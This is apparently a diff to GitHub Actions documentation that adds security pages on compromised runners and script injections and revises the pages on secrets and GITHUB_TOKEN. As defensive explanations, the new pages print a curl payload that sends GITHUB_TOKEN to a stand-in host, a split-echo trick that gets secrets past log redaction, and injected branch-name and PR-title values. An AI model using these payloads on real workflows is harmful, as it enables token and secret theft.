github
diff --git a/‎content/actions/concepts/security/compromised-runners.md
Lines changed: 82 additions & 0 deletions b/‎content/actions/concepts/security/compromised-runners.md
Lines changed: 82 additions & 0 deletions
diff --git a/‎content/actions/concepts/security/github_token.md
Lines changed: 2 additions & 2 deletions b/‎content/actions/concepts/security/github_token.md
Lines changed: 2 additions & 2 deletions
diff --git a/‎content/actions/concepts/security/index.md
Lines changed: 2 additions & 0 deletions b/‎content/actions/concepts/security/index.md
Lines changed: 2 additions & 0 deletions
diff --git a/‎content/actions/concepts/security/script-injections.md
Lines changed: 59 additions & 0 deletions b/‎content/actions/concepts/security/script-injections.md
Lines changed: 59 additions & 0 deletions
diff --git a/‎content/actions/concepts/security/secrets.md
Lines changed: 9 additions & 5 deletions b/‎content/actions/concepts/security/secrets.md
Lines changed: 9 additions & 5 deletions
diff --git a/‎content/actions/how-tos/security-for-github-actions/index.md
Lines changed: 2 additions & 1 deletion b/‎content/actions/how-tos/security-for-github-actions/index.md
Lines changed: 2 additions & 1 deletion
diff --git a/‎content/actions/how-tos/security-for-github-actions/security-guides/index.md
Lines changed: 0 additions & 17 deletions b/‎content/actions/how-tos/security-for-github-actions/security-guides/index.md
Lines changed: 0 additions & 17 deletions
@@ -0,0 +1,82 @@
+---
+title: Compromised runners
+intro: 'Understand the security risks associated with compromised {% data variables.product.prodname_actions %} runners.'
+shortTitle: Compromised runners
+versions:
+  fpt: '*'
+  ghes: '*'
+  ghec: '*'
+redirect_from:
+  - /actions/concepts/security/compromised-runner
+---
+
+## Potential impact of a compromised runner
+
+These sections consider some of the steps an attacker can take if they're able to run malicious commands on a {% data variables.product.prodname_actions %} runner.
+
+{% ifversion fpt or ghec %}
+
+> [!NOTE]
+> {% data variables.product.prodname_dotcom %}-hosted runners do not scan for malicious code downloaded by a user during their job, such as a compromised third party library.
+
+{% endif %}
+
+### Accessing secrets
+
+Workflows triggered from a forked repository using the `pull_request` event have read-only permissions and have no access to secrets. However, these permissions differ for various event triggers such as `issue_comment`, `issues`, `push` and `pull_request` from a branch within the repository, where the attacker could attempt to steal repository secrets or use the write permission of the job's [`GITHUB_TOKEN`](/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token).
+
+* If the secret or token is set to an environment variable, it can be directly accessed through the environment using `printenv`.
+* If the secret is used directly in an expression, the generated shell script is stored on-disk and is accessible.
+* For a custom action, the risk can vary depending on how a program is using the secret it obtained from the argument:
+
+  {% raw %}
+
+  ```yaml
+  uses: fakeaction/publish@v3
+  with:
+      key: ${{ secrets.PUBLISH_KEY }}
+  ```
+
+  {% endraw %}
+
+Although {% data variables.product.prodname_actions %} scrubs secrets from memory that are not referenced in the workflow (or an included action), the `GITHUB_TOKEN` and any referenced secrets can be harvested by a determined attacker.
+
+### Exfiltrating data from a runner
+
+An attacker can exfiltrate any stolen secrets or other data from the runner. To help prevent accidental secret disclosure, {% data variables.product.prodname_actions %} [automatically redact secrets printed to the log](/actions/security-guides/using-secrets-in-github-actions#accessing-your-secrets), but this is not a true security boundary because secrets can be intentionally sent to the log. For example, obfuscated secrets can be exfiltrated using `echo ${SOME_SECRET:0:4}; echo ${SOME_SECRET:4:200};`. In addition, since the attacker may run arbitrary commands, they could use HTTP requests to send secrets or other repository data to an external server.
+
+### Stealing the job's `GITHUB_TOKEN`
+
+It is possible for an attacker to steal a job's `GITHUB_TOKEN`. The {% data variables.product.prodname_actions %} runner automatically receives a generated `GITHUB_TOKEN` with permissions that are limited to just the repository that contains the workflow, and the token expires after the job has completed. Once expired, the token is no longer useful to an attacker. To work around this limitation, they can automate the attack and perform it in fractions of a second by calling an attacker-controlled server with the token, for example: `a"; set +e; curl http://example.com?token=$GITHUB_TOKEN;#`.
+
+### Modifying the contents of a repository
+
+The attacker server can use the {% data variables.product.github %} API to [modify repository content](/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token), including releases, if the assigned permissions of `GITHUB_TOKEN` [are not restricted](/actions/security-guides/automatic-token-authentication#modifying-the-permissions-for-the-github_token).
+
+### Cross-repository access
+
+{% data variables.product.prodname_actions %} is intentionally scoped for a single repository at a time. The `GITHUB_TOKEN` grants the same level of access as a write-access user, because any write-access user can access this token by creating or modifying a workflow file, elevating the permissions of the `GITHUB_TOKEN` if necessary. Users have specific permissions for each repository, so allowing the `GITHUB_TOKEN` for one repository to grant access to another would impact the {% data variables.product.prodname_dotcom %} permission model if not implemented carefully. Similarly, caution must be taken when adding {% data variables.product.prodname_dotcom %} authentication tokens to a workflow, because this can also affect the {% data variables.product.prodname_dotcom %} permission model by inadvertently granting broad access to collaborators.
+
+If your organization is owned by an enterprise account, then you can share and reuse {% data variables.product.prodname_actions %} by storing them in internal repositories. For more information, see [AUTOTITLE](/actions/creating-actions/sharing-actions-and-workflows-with-your-enterprise).
+
+You can perform other privileged, cross-repository interactions by referencing a {% data variables.product.prodname_dotcom %} authentication token or SSH key as a secret within the workflow. Because many authentication token types do not allow for granular access to specific resources, there is significant risk in using the wrong token type, as it can grant much broader access than intended.
+
+This list describes the recommended approaches for accessing repository data within a workflow, in descending order of preference:
+
+1. **The `GITHUB_TOKEN`**
+    * This token is intentionally scoped to the single repository that invoked the workflow, and can have the same level of access as a write-access user on the repository. The token is created before each job begins and expires when the job is finished. For more information, see [AUTOTITLE](/actions/security-guides/automatic-token-authentication).
+    * The `GITHUB_TOKEN` should be used whenever possible.
+1. **Repository deploy key**
+    * Deploy keys are one of the only credential types that grant read or write access to a single repository, and can be used to interact with another repository within a workflow. For more information, see [AUTOTITLE](/authentication/connecting-to-github-with-ssh/managing-deploy-keys#deploy-keys).
+    * Note that deploy keys can only clone and push to the repository using Git, and cannot be used to interact with the REST or GraphQL API, so they may not be appropriate for your requirements.
+1. **{% data variables.product.prodname_github_app %} tokens**
+    * {% data variables.product.prodname_github_apps %} can be installed on select repositories, and even have granular permissions on the resources within them. You could create a {% data variables.product.prodname_github_app %} internal to your organization, install it on the repositories you need access to within your workflow, and authenticate as the installation within your workflow to access those repositories. For more information, see [AUTOTITLE](/apps/creating-github-apps/guides/making-authenticated-api-requests-with-a-github-app-in-a-github-actions-workflow).
+1. **{% data variables.product.pat_generic %}s**
+    * You should never use a {% data variables.product.pat_v1 %}. These tokens grant access to all repositories within the organizations that you have access to, as well as all personal repositories in your personal account. This indirectly grants broad access to all write-access users of the repository the workflow is in.
+    * If you do use a {% data variables.product.pat_generic %}, you should never use a {% data variables.product.pat_generic %} from your own account. If you later leave an organization, workflows using this token will immediately break, and debugging this issue can be challenging. Instead, you should use a {% data variables.product.pat_v2 %} for a new account that belongs to your organization and that is only granted access to the specific repositories that are needed for the workflow. Note that this approach is not scalable and should be avoided in favor of alternatives, such as deploy keys.
+1. **SSH keys on a personal account**
+    * Workflows should never use the SSH keys on a personal account. Similar to {% data variables.product.pat_v1_plural %}, they grant read/write permissions to all of your personal repositories as well as all the repositories you have access to through organization membership. This indirectly grants broad access to all write-access users of the repository the workflow is in. If you're intending to use an SSH key because you only need to perform repository clones or pushes, and do not need to interact with public APIs, then you should use individual deploy keys instead.
+
+## Next steps
+
+For security best practices with {% data variables.product.prodname_actions %}, see [AUTOTITLE](/actions/reference/secure-use-reference).
@@ -12,7 +12,7 @@ versions:
 
 At the start of each workflow job, {% data variables.product.prodname_dotcom %} automatically creates a unique `GITHUB_TOKEN` secret to use in your workflow. You can use the `GITHUB_TOKEN` to authenticate in the workflow job.
 
-When you enable {% data variables.product.prodname_actions %}, {% data variables.product.prodname_dotcom %} installs a {% data variables.product.prodname_github_app %} on your repository. The `GITHUB_TOKEN` secret is a {% data variables.product.prodname_github_app %} installation access token. You can use the installation access token to authenticate on behalf of the {% data variables.product.prodname_github_app %} installed on your repository. The token's permissions are limited to the repository that contains your workflow. For more information, see [AUTOTITLE](/actions/reference/github_token-reference#permissions-for-the-github_token).
+When you enable {% data variables.product.prodname_actions %}, {% data variables.product.prodname_dotcom %} installs a {% data variables.product.prodname_github_app %} on your repository. The `GITHUB_TOKEN` secret is a {% data variables.product.prodname_github_app %} installation access token. You can use the installation access token to authenticate on behalf of the {% data variables.product.prodname_github_app %} installed on your repository. The token's permissions are limited to the repository that contains your workflow. For more information, see [AUTOTITLE](/actions/reference/workflow-syntax-for-github-actions#permissions).
 
 Before each job begins, {% data variables.product.prodname_dotcom %} fetches an installation access token for the job. {% data reusables.actions.github-token-expiration %}
 
@@ -27,4 +27,4 @@ The token is also available in the `github.token` context. For more information,
 ## Next steps
 
 * [AUTOTITLE](/actions/how-tos/security-for-github-actions/security-guides/use-github_token-in-workflows)
-* [AUTOTITLE](/actions/reference/github_token-reference)
+* [AUTOTITLE](/actions/reference/workflow-syntax-for-github-actions#permissions)
@@ -10,5 +10,7 @@ children:
   - /secrets
   - /github_token
   - /openid-connect
+  - /script-injections
+  - /compromised-runners
 ---
 
@@ -0,0 +1,59 @@
+---
+title: Script injections
+intro: Understand the security risks associated with script injections and {% data variables.product.prodname_actions %} workflows.
+shortTitle: Script injections
+versions:
+  fpt: '*'
+  ghes: '*'
+  ghec: '*'
+---
+
+## Understanding the risk of script injections
+
+When creating workflows, [custom actions](/actions/creating-actions/about-custom-actions), and [composite actions](/actions/creating-actions/creating-a-composite-action), you should always consider whether your code might execute untrusted input from attackers. This can occur when an attacker adds malicious commands and scripts to a context. When your workflow runs, those strings might be interpreted as code which is then executed on the runner.
+
+Attackers can add their own malicious content to the [`github` context](/actions/learn-github-actions/contexts#github-context), which should be treated as potentially untrusted input. These contexts typically end with `body`, `default_branch`, `email`, `head_ref`, `label`, `message`, `name`, `page_name`,`ref`, and `title`. For example: `github.event.issue.title`, or `github.event.pull_request.body`.
+
+You should ensure that these values do not flow directly into workflows, actions, API calls, or anywhere else where they could be interpreted as executable code. By adopting the same defensive programming posture you would use for any other privileged application code, you can help security harden your use of {% data variables.product.prodname_actions %}. For information on some of the steps an attacker could take, see [AUTOTITLE](/actions/security-guides/security-hardening-for-github-actions#potential-impact-of-a-compromised-runner).
+
+In addition, there are other less obvious sources of potentially untrusted input, such as branch names and email addresses, which can be quite flexible in terms of their permitted content. For example, `zzz";echo${IFS}"hello";#` would be a valid branch name and would be a possible attack vector for a target repository.
+
+The following sections explain how you can help mitigate the risk of script injection.
+
+### Example of a script injection attack
+
+A script injection attack can occur directly within a workflow's inline script. In the following example, an action uses an expression to test the validity of a pull request title, but also adds the risk of script injection:
+
+{% raw %}
+
+```yaml
+      - name: Check PR title
+        run: |
+          title="${{ github.event.pull_request.title }}"
+          if [[ $title =~ ^octocat ]]; then
+          echo "PR title starts with 'octocat'"
+          exit 0
+          else
+          echo "PR title did not start with 'octocat'"
+          exit 1
+          fi
+```
+
+{% endraw %}
+
+This example is vulnerable to script injection because the `run` command executes within a temporary shell script on the runner. Before the shell script is run, the expressions inside {% raw %}`${{ }}`{% endraw %} are evaluated and then substituted with the resulting values, which can make it vulnerable to shell command injection.
+
+To inject commands into this workflow, the attacker could create a pull request with a title of `a"; ls $GITHUB_WORKSPACE"`:
+
+![Screenshot of the title of a pull request in edit mode. A new title has been entered in the field: a"; ls $GITHUB_WORKSPACE".](/assets/images/help/actions/example-script-injection-pr-title.png)
+
+In this example, the `"` character is used to interrupt the {% raw %}`title="${{ github.event.pull_request.title }}"`{% endraw %} statement, allowing the `ls` command to be executed on the runner. You can see the output of the `ls` command in the log:
+
+```shell
+Run title="a"; ls $GITHUB_WORKSPACE""
+README.md
+code.yml
+example.js
+```
+
+For best practices keeping runners secure, see [AUTOTITLE](/actions/reference/secure-use-reference#good-practices-for-mitigating-script-injection-attacks).
@@ -16,6 +16,14 @@ Secrets allow you to store sensitive information in your organization, repositor
 
 {% data variables.product.prodname_actions %} can only read a secret if you explicitly include the secret in a workflow.
 
+{% ifversion fpt or ghec %}
+
+## How secrets work
+
+Secrets use [Libsodium sealed boxes](https://libsodium.gitbook.io/doc/public-key_cryptography/sealed_boxes), so that they are encrypted before reaching {% data variables.product.github %}. This occurs when the secret is submitted [using the UI](/actions/security-guides/using-secrets-in-github-actions#creating-secrets-for-a-repository) or through the [REST API](/rest/actions/secrets). This client-side encryption helps minimize the risks related to accidental logging (for example, exception logs and request logs, among others) within {% data variables.product.github %}'s infrastructure. Once the secret is uploaded, {% data variables.product.github %} is then able to decrypt it so that it can be injected into the workflow runtime.
+
+{% endif %}
+
 ## Organization-level secrets
 
 {% data reusables.actions.secrets-org-level-overview %}
@@ -40,11 +48,7 @@ Instead of using a {% data variables.product.pat_generic %}, consider using a {%
 
 {% data variables.product.prodname_actions %} also redacts information that is recognized as sensitive, but is not stored as a secret. For a list of automatically redacted secrets, see [AUTOTITLE](/actions/reference/secrets-reference#automatically-redacted-secrets).
 
-> [!NOTE] If you would like other types of sensitive information to be automatically redacted, please reach out to us in our [community discussions](https://github.com/orgs/community/discussions?discussions_q=is%3Aopen+label%3AActions).
-
-As a habit of best practice, you should mask all sensitive information that is not a {% data variables.product.prodname_dotcom %} secret by using `::add-mask::VALUE`. This causes the value to be treated as a secret and redacted from logs. For more information about masking data, see [AUTOTITLE](/actions/using-workflows/workflow-commands-for-github-actions#masking-a-value-in-a-log).
-
-Redacting of secrets is performed by your workflow runners. This means a secret will only be redacted if it was used within a job and is accessible by the runner. If an unredacted secret is sent to a workflow run log, you should delete the log and rotate the secret. For information on deleting logs, see [AUTOTITLE](/actions/monitoring-and-troubleshooting-workflows/using-workflow-run-logs#deleting-logs).
+Because there are multiple ways a secret value can be transformed, this redaction is not guaranteed. Additionally, the runner can only redact secrets used within the current job. As a result, there are certain security proactive steps you should follow to help ensure secrets are redacted, and to limit other risks associated with secrets. For a reference list of security best practices with secrets, see [AUTOTITLE](/actions/reference/secrets-reference#security-best-practices).
 
 ## Further reading
 
 
@@ -5,12 +5,13 @@ intro: 'Use security best practices with {% data variables.product.prodname_acti
 redirect_from:
   - /actions/security-guides
   - /actions/security-for-github-actions
+  - /actions/security-for-github-actions/security-guides
+  - /actions/how-tos/security-for-github-actions/security-guides
 versions:
   fpt: '*'
   ghes: '*'
   ghec: '*'
 children:
-  - /security-guides
   - /using-artifact-attestations
   - /security-hardening-your-deployments
 ---